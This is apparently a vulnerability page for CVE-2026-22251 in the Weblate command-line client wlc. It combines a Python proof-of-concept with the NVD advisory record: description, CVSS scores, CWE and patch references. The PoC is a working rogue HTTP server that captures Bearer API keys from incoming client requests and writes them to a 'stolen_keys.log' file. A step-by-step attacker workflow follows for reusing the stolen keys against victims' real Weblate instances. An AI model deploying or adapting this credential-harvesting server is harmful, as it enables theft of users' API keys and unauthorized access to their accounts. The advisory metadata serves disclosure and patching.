CVE-2026-22251

# CVE-2026-22251 PoC - Simulated API Key Exfiltration # This PoC demonstrates how wlc client may leak unscoped API keys import http.server import socketserver import json import base64 class ExfilHandler(http.server.BaseHTTPRequestHandler): def do_POST(self): content_length = int(self.headers['Content-Length']) post_data = self.rfile.read(content_length) # Log the exfiltrated data print(f"[+] Received connection from: {self.client_address}") print(f"[+] Headers: {dict(self.headers)}") print(f"[+] Data: {post_data.decode('utf-8', errors='ignore')}") # Extract API key from Authorization header auth_header = self.headers.get('Authorization', '') if auth_header.startswith('Bearer '): api_key = auth_header[7:] print(f"[+] Exfiltrated API Key: {api_key}") with open('stolen_keys.log', 'a') as f: f.write(f"{api_key}\n") self.send_response(401) self.end_headers() self.wfile.write(b'Unauthorized') PORT = 8080 with socketserver.TCPServer(("", PORT), ExfilHandler) as httpd: print(f"[*] Malicious server listening on port {PORT}") print("[*] Waiting for wlc client connections...") httpd.serve_forever() # Attacker workflow: # 1. Set up rogue Weblate server or proxy # 2. Wait for victims with unscoped API keys to connect # 3. Capture the API key from Authorization header # 4. Use stolen key to access victim's legitimate Weblate instance

{"cve": {"id": "CVE-2026-22251", "sourceIdentifier": "[email protected]", "published": "2026-01-12T18:15:49.457", "lastModified": "2026-01-27T20:35:05.300", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "wlc is a Weblate command-line client using Weblate's REST API. Prior to 1.17.0, wlc supported providing unscoped API keys in the setting. This practice was discouraged for years, but the code was never removed. This might cause the API key to be leaked to different servers."}, {"lang": "es", "value": "wlc es un cliente de línea de comandos de Weblate que utiliza la API REST de Weblate. Antes de la versión 1.17.0, wlc admitía proporcionar claves de API sin ámbito en la configuración. Esta práctica fue desaconsejada durante años, pero el código nunca fue eliminado. Esto podría causar que la clave de API se filtre a diferentes servidores."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:H/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 0.8, "impactScore": 4.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-200"}]}, {"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "NVD-CWE-noinfo"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:weblate:wlc:*:*:*:*:*:*:*:*", "versionEndExcluding": "1.17.0", "matchCriteriaId": "B01083E5-842F-4D93-8069-D4578C071C90"}]}]}], "references": [{"url": "https://github.com/WeblateOrg/wlc/commit/aafdb507a9e66574ade1f68c50c4fe75dbe80797", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/WeblateOrg/wlc/pull/1098", "source": "[email protected]", "tags": ["Issue Tracking"]}, {"url": "https://github.com/WeblateOrg/wlc/security/advisories/GHSA-9rp8-h4g8-8766", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}